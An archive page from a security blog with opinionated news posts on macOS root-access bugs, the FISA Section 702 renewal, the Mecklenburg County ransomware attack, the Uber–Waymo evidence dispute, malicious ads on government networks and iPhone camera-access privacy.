Category Archives: Uncategorized

Apple is Trying to Catch up With Windows

Update: Apparently if you are running macOS 10.13 and apply the patch to fix the root problem and then upgrade to 10.13.1, that patch gets undone, so you have to reapply the patch.  In addition, the patch does not take effect unless you reboot.  Just another bit of the mess.

The Mac OS has generally been considered a secure operating system, but lately Apple has been trying to imitate their friends from Redmond and not in a good way.

The first MacOS bug found recently is a new bug.  Linux and Unix administrator accounts are called ROOT, unlike Windows and other operating systems which call the account ADMIN or ADMINISTRATOR.  Apparently in the current version of MacOS, High Sierra, if you entered the user name of ROOT with no password, you got an error message, but if you entered it a second time with no password, it let you in with full administrative permissions.

Initially, people thought that this exploit required that you have local access to the computer, but it turned out that if you had remote access turned on as many or most corporate computers do, the attack would work remotely as well.

Apparently the OS detected there was no ROOT account and created one with no password.  The quick fix was to create a ROOT account with a complex password.

Apple quickly created a fix that was automatically and silently installed (I guess that is both good and bad), but that fix broke some other things and Apple had to release a fix to the fix.  That second fix had to be manually installed and required some advanced gyrations on the part of the user.

The good news was that Apple was able to fix the bug quickly once they were told about it.  The bad news is that if a user’s PC was compromised before the installed the patch – which statistically is possible but unlikely – then the only solution is to wipe the disk and start over.

But this was only the start of last month’s problems for Apple.

The second MacOS bug, which also granted users unlimited ROOT access had been around for at least a decade (sound like Windows again?), maybe two decades. or more.

The person who found it was neither a professional hacker nor a professional security researcher, but rather a self titled hobbyist.  This means that other people (and not the well intentioned ones) could have known about it for 20 years or more.

The bug was in the IOHIDF family of software.  This software has been a problem child in the past.  The hobbyist who discovered it released a proof of concept for all of the hackers to follow at the same time he announced the bug.

As of 17 hours ago, Apple had yet to comment on it, but I assume that their engineers are busy working on how to fix it.

Right now it counts as an 0-day, and a nasty one.  0-days are bugs that were not (publicly) known about prior to the announcement.  Except that in this case, it was probably known about by others, such as the Chinese, Russians or American spies and possibly exploited – maybe for many years.

For a while, Apple computers seemed to be immune to bugs.  I don’t think that is necessarily because the software is super secure, but rather because it is a niche player with a small market share (less than 8 percent according to NetMarketShare).  As other operating systems were attacked and started fixing bugs, MacOS became the next target of opportunity.

So, in this case, one bug is fixed, albeit a bit bumpily and the other is still open.

Happy New Year Mac users!

Information for this post came from CNet, The Guardian and BetaNews.

 

Facebooktwitterredditlinkedinmailby feather

Congress Votes to Kick The Can Down The Road on Spying

Section 702 of the Foreign Intelligence Surveillance Act allows the intelligence community to collect intelligence on non-Americans outside the United States without a warrant.  As the intelligence community hoovers up huge quantities of data (they just built a new facility in Utah so that they could bring enough storage online to hold all the data), it is inevitable that they will collect information on Americans, absent a warrant, absent probable cause.  They say there are controls in place to protect Americans, but those controls do not, some say, match the requirements of the Fourth Amendment to the U.S. Constitution.

The Congress, in 2008, had the wisdom to require that Section 702 be renewed every few years.  The result of that is to force a debate and make Congress-critters go on record voting for or against whatever the revised 702 requires.  The last vote to renew Section 702 was in 2012 and it is set to expire on December 31, 2017, about 7 days from now.

In Congress there are several different factions right now:

  • One group wants to renew Section 702 as is and make it permanent.
  • Another group wants to require the FBI to get a court order before viewing information on Americans – information that they hope to use in criminal cases.
  • Others want the FBI to go to the Foreign Intelligence Surveillance Court to weigh in on the legality of query on Americans, pretty much a rubber stamp approval.
  • Finally others want to scrap it entirely.

So Congress does what it does best and renewed Section 702 for another 28 days and went on vacation.

Congress, is on vacation until January 8th and with absolutely no agreement on what to do and only 10 days between when Congress returns and the expiration, do not be surprised if Congress kicks the can down the road again and extends it another 30 days.

Unlike some bills in Congress, this is not an Elephants vs. Donkeys issue;  this is a privacy rights vs. national security issue.

The House Freedom Caucus Chairman told the media that no long term extension would get through Congress at this time.

Republican Sen. Rand Paul and Democratic Sen. Ron Wyden want to bring the fight to the floor.

My personal opinion is that Congress is unlikely to let Section 702 expire.  I just don’t think that is going to happen.  But what form of restrictions are going to be put in place – that is a much harder question to answer.

 

Information for this post came from the Washington Post.

 

 

Facebooktwitterredditlinkedinmailby feather

Mecklenburg County Hit With Ransomware Attack

Mecklenburg County, North Carolina, home to Charlotte, was hit with a ransomware attack that the county was clearly unprepared to handle.

The good news, if there is any in a situation like this, is that the attackers only compromised about 48 out of the county’s 500 servers, but other servers were shut down to make sure the ransomware didn’t spread to those servers.

The bad news, and there is much more of that, is that the county says it will be some time in 2018 before they get everything put back together.

Some reports say that the attackers wanted two bitcoins or about $30,000, but other reports say they wanted two bitcoins per server, which would have put the bill in the millions.  The county has decided not to pay the ransom.

The county said that because of a backup system, the hack didn’t compromise any personal information.  Clearly, the county officials do not understand how technology works.

This is also one reason why these local governmental organizations can be picked off pretty easily.  Likely due to staffing, money and lack of executive support, these local governments have  poor to non-existent cyber security, disaster recovery and business continuity programs.

Examples of the effects of the backup system that was in place are that calls to the domestic violence hotline are going to voice mail and being picked up later by counselors.

The county jail is having to process inmates in and out of the jail using paper forms.  I am highly confident that nothing will go wrong.

Social Services is having to recreate rides scheduled for seniors and many of those ride requests have been forever lost.

Payments to the tax department have to be made by cash or check and building inspections are using paper forms.

The goal is to attempt to get life preserving services up first and the rest of the services restored in 2018.

Mecklenburg is far from alone in this plight.  City and County governments, especially, do not have either the budget or the expertise to deal with modern day, real world cyber attacks.  All they can do is hope that no one clicks on an infected link in an attack email.

The private sector is in better but not great shape.  They are much more motivated to have systems that work and not spend the millions of dollars that I am sure Mecklenburg is spending to rebuild servers from scratch.  Businesses also don’t want to lose customers.  When Fedex got hit with the WannaCry virus, customers switched to their competitors.  Many of those will never come back.  Mecklenburg doesn’t have that problem – there is no competing government to switch to.

For private businesses, these attacks can be the difference between a profit and a loss, staying in business or going out of business.  Fedex, in the example above, spent $300 million recovering from WannaCry last quarter and will spend an equal amount this quarter.  Many businesses cannot afford the bills that these attacks generate and just go out of business.

Information for this post came from  The Washington Post  and NBC News.

Facebooktwitterredditlinkedinmailby feather

Uber Naughty Tricks Hide Evidence of Theft

First a disclaimer:  I am not a lawyer and don’t pretend to be one on the Internet – at least most of the time.

The Uber Waymo trade secret theft trial is being delayed once again.

Why?  Because the Department of Justice showed the Judge a 37 page letter from the lawyer of a former Uber employee that Uber had not shared with Waymo.  The judge now wants the former employee to appear in court.

The judge is “unhappy” with Uber because he asked them to produce all relevant documents months ago and this document was not among those produced.  The judge said that he can’t trust anything that they say because they have been proven wrong so many times before.  That is probably not the best way to get on the good side of the judge.

The ex-employee was fired from his job at Uber in April but still works for them as a consultant.  They paid him $2+ million plus another million at the end of his consulting contract plus $1 million plus in Uber stock.

The ex-employee said that Uber has a unit within the company called marketplace analytics who’s job is to obtain competitive intel, “acquire” trade secrets and gathering code base.  Your basic dirty tricks organization who’s job it is to break the law and steal confidential information from competitors.

OK, maybe I am being a bit harsh on them, but the methods and techniques really determine whether they broke any laws or not and that is still to be seen.

The ex-employee said that the employees of this group were trained in impeding, obstructing or influencing any lawsuit against Uber.  This includes working very hard to make sure that there was no paper trail of what they were doing.

The employees used self destructing messaging services like Wikr, computers that could not be traced back to Uber and separate servers from the rest of the company.  They even made up reasons – apparently not legally valid ones – for attorney-client privilege.  They also engaged 10 outside security firms.

Waymo is suing Uber for almost $2 billion for theft of trade secrets.

Uber of course, said this is all made up.

There is one thing that is crystal clear as I play a lawyer on the Internet (no this is not legal advice).  *IF* and that is a big if, Uber hid information that they should have disclosed to the other side, that qualifies as a big no-no and could cause Uber all kinds of problems all the way up to the judge providing a verdict in Waymo’s favor.  That level of pain is VERY unusual, but the judge could fine the company, hold them in contempt or even instruct the jury to interpret certain facts in a way that is very unfavorable to Uber because of this.

Right now, he has delayed the trial while Waymo’s attorneys review the letter and decide what to do.

As far as how this affects you and me – if you believe that you MAY be sued, you have  “a duty to preserve” evidence that may be relevant to the future case.  Not preserving the evidence could cause you to lose the case.

OK, that seems pretty straight forward.

Well, maybe.  What if your employees, on their own, decided to use Telegraph or Wickr; decided to use other non-company systems to process or store data – all of which could be part of your duty to preserve.  And what if they did this without telling senior management about this.

The company could be in a world of hurt legally.

What this means is that you as an employer need to understand what tools your employees maybe using, even unofficially or unsanctioned and work with your corporate attorneys to figure out if that is a problem.

For certain industries, you have a duty to preserve even if there is no lawsuit anticipated, so for those companies, without regard to any potential lawsuit, using these tools can get them in trouble.

Something else for you to deal with.  Sorry.

Information for this post came from Reuters.

Facebooktwitterredditlinkedinmailby feather

Gov May Block Malicious Content on Gov Computers but Not Yours

I have long complained about ads on web sites delivering malicious content in addition to ads.  In fact, I have even advocated blocking ads because of it, but since most web sites exist because of the revenue generated from those ads, the ad content is only getting more invasive.

There have been many incidents of ads serving up malware and infecting computers in homes, businesses and government offices, so this is a real problem.  And, of course, if that malware gets onto government computers, it could steal important stuff.  Not like the malware on your computer or mine (or at least that seems to be what they are saying).

The government has a solution.  Sort of.  US Senator Ron Wyden sent a letter to White House cybersecurity coordinator Rob Joyce asking him to coordinate discussions with the advertising industry to end the delivery of malicious ads on government networks.

That’s not a bad thing although I am not sure why Wyden thinks it is OK to deliver malicious ads to you and me – just not to the government.

The good news is, of course, if they actually implement something to stop the delivery of malicious ads to government computers, they will likely implement it everywhere.

But after he makes this sort of benign request, he ups the ante.

If, after 180 days, you are not completely confident that the ad industry will effectively address this cyber threat, then have DHS issue a binding order requiring federal agencies to block all ads containing executable code.

I am sure that Google and the advertising industry is thrilled.  NOT!

In the industry’s defense, I am sure that they are trying to block malicious content;  the only question is how hard.  After all, even malicious ads generate revenue and it is hard to filter all ads.

If the White House takes Wyden seriously that could be a problem for the advertising industry.  Whatever the government does, other businesses are likely to follow and the end result would be a reduction in ad revenue if people start blocking ads in even larger quantities than they are doing today.  Software like Ad Blocker Plus is pretty popular.  According to one stat, 26% of desktop users and 15% of mobile users currently block ads.  If that only goes up a few percentage points that would be expensive to Google and the ad industry.

Sites that look for ad blockers and which won’t let you visit the site if you are blocking ads (like Forbes.com, for example) would be completely off limits to government workers.  That alone would, I think, motivate the industry to get off its rear and solve the problem.

Stay tuned and lets see what Washington does.  If they really do something, that would be very helpful.

As I said, stay tuned.

Information for this post came from Bleeping Computer.

Facebooktwitterredditlinkedinmailby feather

The Spy Among Us

Multiple sources are reporting a feature of iPhone apps that is a major privacy concern.  This is not new and it also is an issue on Android phones, but, for some reason, everyone seems to be highlighting the problem with iPhones.  PERHAPS, that is because it it is being exploited in the wild on iPhones – I don’t know.

The short version goes like this –

IF you EVER allow an app to access your phone’s cameras, you have lost control of it.  That app can access your camera – both front facing and rear facing – whenever it wants to.  It does not have to ask you to access the camera.

You are trusting that app not to abuse that trust.

Actually, it kind of depends on whether YOU installed the app or someone else installed it – with or without your knowledge.  For example, here are 5 spying apps that people intentionally install.  It may be a parent or a spouse, but it is likely not you who installed the app.  Sometimes parents want to track what their kids are doing.  Sometimes a spouse wants to spy on their significant other.

The app could upload the photos to the net and/or it could process the images – say to examine your facial images as you look at the screen.

One part of the problem is that there is no indication that the camera, front or back, is on.  As a side note, while there is a light on many PCs indicating the camera is running, that is a bit of software and the camera COULD be turned on without the light being on.

Apple (and Google) could change the camera rules and require the user to approve camera access every single time the camera wants to turn on – but that would be inconvenient.

One of my contacts at the FBI forwarded an alert about this today, so I suspect that this is being actively exploited.

The FBI gave a couple of suggestions –

  1. Only install apps from the official app store, not anyplace else.
  2. Don’t click on links in emails

In reality, the only recommendation that the FBI made that will actually work is this next one:

3. Place a piece of tape over the front and rear camera.

Ponder this thought –

The camera sits on your table in front of you;  it is in your bedroom, potentially capturing whatever you do there; it is in your bathroom. You get the idea.

Just in case your were not paranoid enough before.

Information for this post came from The Hacker News and The Register.

Facebooktwitterredditlinkedinmailby feather